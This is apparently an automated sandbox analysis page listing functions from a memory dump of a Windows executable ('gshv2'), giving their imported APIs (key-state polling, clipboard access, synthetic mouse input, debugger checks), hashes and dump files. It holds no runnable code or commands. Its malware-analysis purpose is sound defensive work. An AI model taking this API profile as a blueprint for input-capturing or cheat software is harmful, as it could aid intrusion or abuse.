Instruction ID: 506bd9cf3f5e0ed11847d69fa8d3610ad922a6147877ce85b828ecdfef36846d
Opcode Fuzzy Hash: 787a01ce0175e07ad6569f3f0a62db25fe358f7210c8c78cf02ed56572ea0b2f
Instruction Fuzzy Hash: 0C334332915BC99ADB01CB37C8402BC7B60FFD9B54F0ACB75DA09672B1DF26A0859B11

Function 00007FF62C0CE300 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 254
windowkeyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageA.USER32 ref: 00007FF62C0CE35C
TranslateMessage.USER32 ref: 00007FF62C0CE36D
DispatchMessageA.USER32 ref: 00007FF62C0CE37A
GetForegroundWindow.USER32 ref: 00007FF62C0CE380
GetWindow.USER32 ref: 00007FF62C0CE397
SetWindowPos.USER32 ref: 00007FF62C0CE3BD
GetAsyncKeyState.USER32 ref: 00007FF62C0CE3C8
GetClientRect.USER32 ref: 00007FF62C0CE3EF
ClientToScreen.USER32 ref: 00007FF62C0CE401
GetCursorPos.USER32 ref: 00007FF62C0CE438
GetAsyncKeyState.USER32 ref: 00007FF62C0CE471
SetWindowPos.USER32 ref: 00007FF62C0CE516
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0CE606
DestroyWindow.USER32 ref: 00007FF62C0CE612
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE638
DefWindowProcA.USER32 ref: 00007FF62C0CE6A1
PostQuitMessage.USER32 ref: 00007FF62C0CE765
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE770

Strings

Gideion, xrefs: 00007FF62C0CE300

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Window$Message$AsyncClientStateexit$CursorDestroyDispatchForegroundPeekPostProcQuitRectScreenTranslatefree
String ID: Gideion
API String ID: 668840768-1545131839
Opcode ID: 0c8a0e5ddc37e4d5efde03353666bf3b3b2b7c76448a3e914d3988d3f2c76c32
Instruction ID: 1d00eefbcfede93a9a01a215f78746fc673a786cdb5357d7d9c5c5a197336c33
Opcode Fuzzy Hash: 0c8a0e5ddc37e4d5efde03353666bf3b3b2b7c76448a3e914d3988d3f2c76c32
Instruction Fuzzy Hash: 97D13935A18B8286EF10CB15EC8027977A0FF99BA4F144136DA5D837A4DF3EE584C712

Function 00007FF62C0BEA90 Relevance: 23.5, APIs: 18, Instructions: 1041COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BEC18
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BEC4B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BECEB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BED9F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BEDC8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BEDF8
memset.VCRUNTIME140 ref: 00007FF62C0BEE0F
memset.VCRUNTIME140 ref: 00007FF62C0BEE1D
memset.VCRUNTIME140 ref: 00007FF62C0BEE2A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF346
memset.VCRUNTIME140 ref: 00007FF62C0BF35E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF549
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF56F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF5AF

Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C02A7
Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C02D6
Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C0305

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF9CD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BF9F4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BFA1B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BFBBE

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free$malloc$memset
String ID:
API String ID: 1620901979-0
Opcode ID: 0cd76954bdf1da716863ed24f0d37e0672295474ecdd576644e884f3d2fb540d
Instruction ID: 5f2e6f1a49a3ca082a3ee134548bb514dfa6f51da1a4886c7ac5217ecbe52f31
Opcode Fuzzy Hash: 0cd76954bdf1da716863ed24f0d37e0672295474ecdd576644e884f3d2fb540d
Instruction Fuzzy Hash: EFB2E036A04B848AEB54CF26D8406BD77A4FB49B94F148336EE4D93794DF3AE491CB01

Function 00007FF62C0B4D50 Relevance: 15.8, APIs: 10, Instructions: 832
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B4E88
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B5408
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B5438
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B58E4
memcpy.VCRUNTIME140 ref: 00007FF62C0B5907
memcpy.VCRUNTIME140 ref: 00007FF62C0B591F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B5945
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B5973
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B59BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B59E7

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free$mallocmemcpysqrtf
String ID:
API String ID: 943526449-0
Opcode ID: 0ff9c9956987492927c662ad6b4145456a3da9b57a831e645ae833e85ae0cdd3
Instruction ID: cd9fa3646216eacdd6f7123db2872d16d0ac999e7bba7ee21c3e41402b275e44
Opcode Fuzzy Hash: 0ff9c9956987492927c662ad6b4145456a3da9b57a831e645ae833e85ae0cdd3
Instruction Fuzzy Hash: 5C72AB22E28BE845D713C736544227AA6D1EF6E784F19D333EE49A6661DF3EE442C700

Function 00007FF62C0D00D0 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF62C0D00EC
memset.VCRUNTIME140 ref: 00007FF62C0D0110
RtlCaptureContext.KERNEL32 ref: 00007FF62C0D0119
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62C0D0133
RtlVirtualUnwind.KERNEL32 ref: 00007FF62C0D0174
memset.VCRUNTIME140 ref: 00007FF62C0D01A7
IsDebuggerPresent.KERNEL32 ref: 00007FF62C0D01C8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62C0D01E9
UnhandledExceptionFilter.KERNEL32 ref: 00007FF62C0D01F4

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: c0b6c58100d424723d771673bda06a009e4ae6bdc370d546d38c9e27518e0b24
Instruction ID: f150f79692f9147bf69392c2eedd814a069ff94e900b3861ea2956f82e4d3a41
Opcode Fuzzy Hash: c0b6c58100d424723d771673bda06a009e4ae6bdc370d546d38c9e27518e0b24
Instruction Fuzzy Hash: 1D315E72609B8186EB608F60EC407ED7764FB88758F44443ADB4E87B99DF39D648C704

Function 00007FF62C0B88D0 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B89C2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B89F0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8A1F
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8A4A
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8C48
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8C76
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8CA5
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B8CD0

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 2aeaee29e4b4a54f73a39816d4fe9bebab73c2cbc8efa71cc2618576ad85fdd0
Instruction ID: aacf6b057d53b4234f1b9c06fa37c0f30c029feb93e04fc5d1a1cd7251b13ed1
Opcode Fuzzy Hash: 2aeaee29e4b4a54f73a39816d4fe9bebab73c2cbc8efa71cc2618576ad85fdd0
Instruction Fuzzy Hash: F9B1C622E28BCC81E623963354821FAE250AFBF3D5F2DDB23FD84756B2AF2561D15540

Function 00007FF62C0B1A40 Relevance: 12.1, APIs: 8, Instructions: 90clipboardCOMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF62C0B1A9A

Part of subcall function 00007FF62C0CF768: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF62C0B1A9F), ref: 00007FF62C0CF778
Part of subcall function 00007FF62C0CF768: LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF62C0B1A9F), ref: 00007FF62C0CF7B8

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1ACB
OpenClipboard.USER32 ref: 00007FF62C0B1AD9

Part of subcall function 00007FF62C0CF7C8: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF62C0B1A70), ref: 00007FF62C0CF7D8

GetClipboardData.USER32 ref: 00007FF62C0B1AF5
CloseClipboard.USER32 ref: 00007FF62C0B1B03
GlobalLock.KERNEL32 ref: 00007FF62C0B1B1E
GlobalUnlock.KERNEL32 ref: 00007FF62C0B1B82
CloseClipboard.USER32 ref: 00007FF62C0B1B88

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Clipboard$CriticalSection$CloseEnterGlobal$DataInit_thread_footerLeaveLockOpenUnlockfree
String ID:
API String ID: 1560965594-0
Opcode ID: 9d196a3fc83a9f5a7743c28566c4774a8a7c6b66864d16906c6edbfbdf23186c
Instruction ID: a8dca7dcfb4ee39072ae8a5ebcff9238b5dd748eb03963b01587851570494332
Opcode Fuzzy Hash: 9d196a3fc83a9f5a7743c28566c4774a8a7c6b66864d16906c6edbfbdf23186c
Instruction Fuzzy Hash: 09413F21A18B4382FF44DB51AC9027923A1FF88BA0F445575D91EC37A5EF3EE9458702

Function 00007FF62C0B1BB0 Relevance: 12.1, APIs: 8, Instructions: 58clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF62C0B1BBB
GlobalAlloc.KERNEL32 ref: 00007FF62C0B1C19
GlobalLock.KERNEL32 ref: 00007FF62C0B1C2A
GlobalUnlock.KERNEL32 ref: 00007FF62C0B1C40
EmptyClipboard.USER32 ref: 00007FF62C0B1C46
SetClipboardData.USER32 ref: 00007FF62C0B1C54
GlobalFree.KERNEL32 ref: 00007FF62C0B1C62
CloseClipboard.USER32 ref: 00007FF62C0B1C68

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: 6284ea59a3732fccb56e1a1851666f2e9564361494126d10d765fd1194a115ca
Instruction ID: b5c1a890d830d356af3ff8e0c1ba81f7c4d66b6916ec39838466b4b6b7768cac
Opcode Fuzzy Hash: 6284ea59a3732fccb56e1a1851666f2e9564361494126d10d765fd1194a115ca
Instruction Fuzzy Hash: F811B125B0870282EF109B15AC18379A391EF8ABE1F088035DA4EC67A5DF2EEC458702

Function 00007FF62C0C4B00 Relevance: 11.0, APIs: 7, Instructions: 461COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4D08
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4D21
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4DC5
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4E16
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4E6A
fmodf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4E84
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C4FB1

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: powf$fmodf
String ID:
API String ID: 2099400205-0
Opcode ID: 0c0d48fdabba15076126b4af9f5a3018bc999265989382c921905e10a524fa04
Instruction ID: e80b65ad10bae544c0b4ec121285d07b5fef11a9851f1de8e786683db6eefa5b
Opcode Fuzzy Hash: 0c0d48fdabba15076126b4af9f5a3018bc999265989382c921905e10a524fa04
Instruction Fuzzy Hash: D322F632D18B8D85E7129B7788411B8B350FF6E3A8F199B32FD48761E1DF2AB1819711

Function 00007FF62C0BB930 Relevance: 9.9, APIs: 6, Instructions: 921COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BBB4E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BBBD7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BBC63
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BBCEC
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BBDCD
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BC70B

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 540d3ff0a6dadd1e9ad01d68575868912d4e61fd6ec709d9a144940724227262
Instruction ID: 184261f7528be5d5f1355aa9edd089dbc429c350386ae88f89e532c67e47396b
Opcode Fuzzy Hash: 540d3ff0a6dadd1e9ad01d68575868912d4e61fd6ec709d9a144940724227262
Instruction Fuzzy Hash: 1AA26A33924B889AD712CF37D4811A8B760FF6D798B199B16EB0963761DB34F1A4DB00

Function 00007FF62C0BC910 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 411COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BCAEE
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BCB63
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BCBD9
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0BCC4F

Strings

(, xrefs: 00007FF62C0BCE6B

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: sqrtf
String ID: (
API String ID: 321154650-3887548279
Opcode ID: ac657b2c4dfe38cbb9dc794152d525485ad6c36f22a2cd517f84b099d641925c
Instruction ID: d4a02563bdb00baaaf6e2a491420706bb58eba04c5c5c0079c794e76cc7c651f
Opcode Fuzzy Hash: ac657b2c4dfe38cbb9dc794152d525485ad6c36f22a2cd517f84b099d641925c
Instruction Fuzzy Hash: 3012B233A24BC886D712CF3B84421ADB361EF6E798B19D712EA0973665DF35B0A1D740

Function 00007FF62C0B7C80 Relevance: 7.8, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B7D0C
memset.VCRUNTIME140 ref: 00007FF62C0B7E00
memset.VCRUNTIME140 ref: 00007FF62C0B7E19
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B7E9B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B80EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B8137

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: freemallocmemset
String ID:
API String ID: 3809226132-0
Opcode ID: fbba6ab974f7c18feb6c50abf0fdb33e336e1a1d525bb28d27b7b233eafd0284
Instruction ID: 4cf05703777700ab7cdb7abfb89abe87ff69d69173ffecb329df0616ecbe74fc
Opcode Fuzzy Hash: fbba6ab974f7c18feb6c50abf0fdb33e336e1a1d525bb28d27b7b233eafd0284
Instruction Fuzzy Hash: 1CD1D332A09B8586EB21CB29D4412B9B3A4FF98794F099331EB4CA3764DF3AF551C701

Function 00007FF62C0B99D0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B9C69
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B9C8B
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B9CAB
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B9CCD

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: 2a0fadcd38f7d532cd5e313d664216abb2175ca296a21c59b57e0a598e2814fd
Instruction ID: 54ab973f9a8080bca66825f615ce4129b258956158d79c83e0b61c441789f248
Opcode Fuzzy Hash: 2a0fadcd38f7d532cd5e313d664216abb2175ca296a21c59b57e0a598e2814fd
Instruction Fuzzy Hash: 6CA12833A186D486D325CB36A0416BABBA1FB9D785F158326FAC863755DF3CD580CB40

Function 00007FF62C0D04F0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF62C0D051C
GetCurrentThreadId.KERNEL32 ref: 00007FF62C0D052A
GetCurrentProcessId.KERNEL32 ref: 00007FF62C0D0536
QueryPerformanceCounter.KERNEL32 ref: 00007FF62C0D0546

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 404da5d8976d1f65c74cf5ca0df8bafecf5892086a85a90f0d541670af353162
Instruction ID: af370d5f22f52f159ca64d097d91bb9706c79626557eccc469d5b8e4ad6af16a
Opcode Fuzzy Hash: 404da5d8976d1f65c74cf5ca0df8bafecf5892086a85a90f0d541670af353162
Instruction Fuzzy Hash: 22117C32A04F028AEF10DF60EC442A833A4FB5DB68F041A31EA9D82794DF3CD5A58340

Function 00007FF62C0C73E0 Relevance: 4.6, APIs: 3, Instructions: 107COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 00007FF62C0C7511
mouse_event.USER32 ref: 00007FF62C0C7537
mouse_event.USER32 ref: 00007FF62C0C7554

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: de64ebb972d2a14c0cc8d54fb917160ab398f0b86f0d46df641b576cd2a03e6d
Instruction ID: 93b7e7e907cd57a1cd39e6ec68d632b23b55db3444fd97c8a6faf8fbb461182c
Opcode Fuzzy Hash: de64ebb972d2a14c0cc8d54fb917160ab398f0b86f0d46df641b576cd2a03e6d
Instruction Fuzzy Hash: 4741E212D28B9D81E523A33F68017A6A6915FBE259E1CD733FE58B14E0EF1E72D18601

Function 00007FF62C0C43D0 Relevance: 2.9, Strings: 2, Instructions: 403COMMON

Download Yara Rule

Strings

#SCROLLY, xrefs: 00007FF62C0C4400
#SCROLLX, xrefs: 00007FF62C0C43EC

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID: #SCROLLX$#SCROLLY
API String ID: 0-350977493
